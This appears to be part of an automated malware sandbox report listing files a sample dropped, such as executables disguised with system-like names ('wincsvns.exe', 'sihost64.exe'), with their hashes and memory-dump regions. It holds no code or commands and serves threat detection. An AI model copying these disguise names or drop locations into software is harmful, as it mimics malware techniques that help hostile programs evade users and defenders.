C:\Users\Admin\AppData\Local\Temp\1533620072.exe

MD5 c8a69840ffff790ea975bb0cf55f7f4d
SHA1 dd1c74f0eb2fc813d16c96669e22fb657b67c4b3
SHA256 e532a8c62dbf01fecc09896f376e689ee836c5498ff24586ed142f72cfd174dc
SHA512 df22b912e15640cd1c5f91908e1e2d2b4fc7be27d54415fd2c0ba5f0de83a785662b67912e4513e13fde30abab4082763d4dd6e65ddc2cdfe47bbe6ee40d249a

C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\CNLYUSDZ\3[1]

MD5 9e2f163c15ee457be1f51981985570a1
SHA1 4a191e6da4a85b915f285e758d0789d2ede3aff1
SHA256 c7de55ddd548f4f268979e1f0c70ab0edb2566c0ce46b921ea281e1570abad82
SHA512 4b3eae4a1df79ac8805f46d32daecdb54028d160a5056679d4478c08e7f8ff42df5f84f4b1fe2cb8b5f3574eae5b18a94ad865edfc4d314a51118316c907967d

C:\Users\Admin\tncmds.dat

MD5 07872b17cfd93a2792bd0b17f5c07002
SHA1 7de2ee0b5255ecc6720fb91cae5e51af20a0e4c5
SHA256 44a3fbe34f99b539d55342fc99c33a9d5c6da95bfc765d94c47eb64ecbdbede0
SHA512 f6c519a48afd92a1eee0f6e4efdf9f0c0cd6104e7edae202aee33d1d8036be3be681032383c0b36fd1ca71ae53600d55b05bb736410f905de06b0f5364d64d37

memory/2480-426-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\47587152.exe

MD5 a475e43527d7dc7d6f2d23bad64fcc99
SHA1 793a7625c0106d6cd79d060b4eec94e58530833e
SHA256 f97c43bf3dce6180e658f2c3776e31cf52472b28ac8249be4d307880b6405eeb
SHA512 4af57a218d7d790b5ec4581dd2bc941deff05ea11bf6054a9d268c054af421977cdd68d5090884358208925f50023c97e9cfaba0831d72e9bcdcca729447d900

C:\Users\Admin\AppData\Local\Temp\47587152.exe

MD5 a475e43527d7dc7d6f2d23bad64fcc99
SHA1 793a7625c0106d6cd79d060b4eec94e58530833e
SHA256 f97c43bf3dce6180e658f2c3776e31cf52472b28ac8249be4d307880b6405eeb
SHA512 4af57a218d7d790b5ec4581dd2bc941deff05ea11bf6054a9d268c054af421977cdd68d5090884358208925f50023c97e9cfaba0831d72e9bcdcca729447d900

C:\Users\Admin\tnnodes.dat

MD5 a2eb00e16d2d222a9b15cd0c565ad9a0
SHA1 3a3a0658f5a0395f7b3b175d0bdb2e30a1e53414
SHA256 1c93017a92d9c60f2687e0bf497f780440bc4626121adcac6c92c0194e5762e8
SHA512 b5c0030c3982e56203a840899242ed009054843a450eb33a31da4683d81a5f84d5a4af1ec742d786c58141df29b4289f33f326038ccc38b46f214f9e12e4e9fa

memory/1908-474-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\2314210268.exe

MD5 7990f0feb5dd2934aef2d546fd782a07
SHA1 7a10b7a22b964bd76effdbdc799098481fa72102
SHA256 584453b0ac50b6c6ca75aa0698ff3593c393709ad8b18f2708c6440528e8b7a1
SHA512 d87d7db1095e9a382c396c75d69c9b0e3634ca88d6dd52005afa9a35a2f40439dee7d8c84cb336d51f27578880fa77c587edf62956471d332687be519136ca18

C:\Users\Admin\AppData\Local\Temp\2314210268.exe

MD5 7990f0feb5dd2934aef2d546fd782a07
SHA1 7a10b7a22b964bd76effdbdc799098481fa72102
SHA256 584453b0ac50b6c6ca75aa0698ff3593c393709ad8b18f2708c6440528e8b7a1
SHA512 d87d7db1095e9a382c396c75d69c9b0e3634ca88d6dd52005afa9a35a2f40439dee7d8c84cb336d51f27578880fa77c587edf62956471d332687be519136ca18

memory/4644-481-0x000001D5EFD60000-0x000001D5EFF80000-memory.dmp

memory/4644-483-0x000001D5D7270000-0x000001D5D7282000-memory.dmp

memory/4812-485-0x0000000000000000-mapping.dmp

memory/1784-486-0x0000000000000000-mapping.dmp

memory/4644-487-0x000001D5D5290000-0x000001D5D54B0000-memory.dmp

memory/4216-488-0x0000000000000000-mapping.dmp

memory/224-490-0x0000000000000000-mapping.dmp

C:\Users\Admin\wincsvns.exe

MD5 7990f0feb5dd2934aef2d546fd782a07
SHA1 7a10b7a22b964bd76effdbdc799098481fa72102
SHA256 584453b0ac50b6c6ca75aa0698ff3593c393709ad8b18f2708c6440528e8b7a1
SHA512 d87d7db1095e9a382c396c75d69c9b0e3634ca88d6dd52005afa9a35a2f40439dee7d8c84cb336d51f27578880fa77c587edf62956471d332687be519136ca18

C:\Users\Admin\wincsvns.exe

MD5 7990f0feb5dd2934aef2d546fd782a07
SHA1 7a10b7a22b964bd76effdbdc799098481fa72102
SHA256 584453b0ac50b6c6ca75aa0698ff3593c393709ad8b18f2708c6440528e8b7a1
SHA512 d87d7db1095e9a382c396c75d69c9b0e3634ca88d6dd52005afa9a35a2f40439dee7d8c84cb336d51f27578880fa77c587edf62956471d332687be519136ca18

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\conhost.exe.log

MD5 84f2160705ac9a032c002f966498ef74
SHA1 e9f3db2e1ad24a4f7e5c203af03bbc07235e704c
SHA256 7840ca7ea27e8a24ebc4877774be6013ab4f81d1eb83c121e4c3290ceb532d93
SHA512 f41c289770d8817ee612e53880d3f6492d50d08fb5104bf76440c2a93539dd25f6f15179b318e67b9202aabbe802941f80ac2dbadfd6ff1081b0d37c33f9da57

memory/4076-504-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe

MD5 480af431f9b7f20202cbeef81ccb9a8e
SHA1 65ef2c809b571e75809074afeae02950f3404441
SHA256 862c961c71218944d9f0724562f487f8396d91803da4e1678ddb0042d843c64b
SHA512 23737eb0a0d2a2ffa728690ceeb3b534838cb889bd0a0b206b0147fa4cef05427c8dac3ecea5c6bf98e899f81d70d7510af9267569e3dad4e752d4aec4ff3951

C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe

MD5 480af431f9b7f20202cbeef81ccb9a8e
SHA1 65ef2c809b571e75809074afeae02950f3404441
SHA256 862c961c71218944d9f0724562f487f8396d91803da4e1678ddb0042d843c64b
SHA512 23737eb0a0d2a2ffa728690ceeb3b534838cb889bd0a0b206b0147fa4cef05427c8dac3ecea5c6bf98e899f81d70d7510af9267569e3dad4e752d4aec4ff3951

memory/3608-509-0x000000014030F3F8-mapping.dmp

memory/2004-518-0x000001A593910000-0x000001A593916000-memory.dmp

memory/3608-523-0x0000000140000000-0x0000000140786000-memory.dmp

memory/2004-524-0x000001A591D90000-0x000001A591D96000-memory.dmp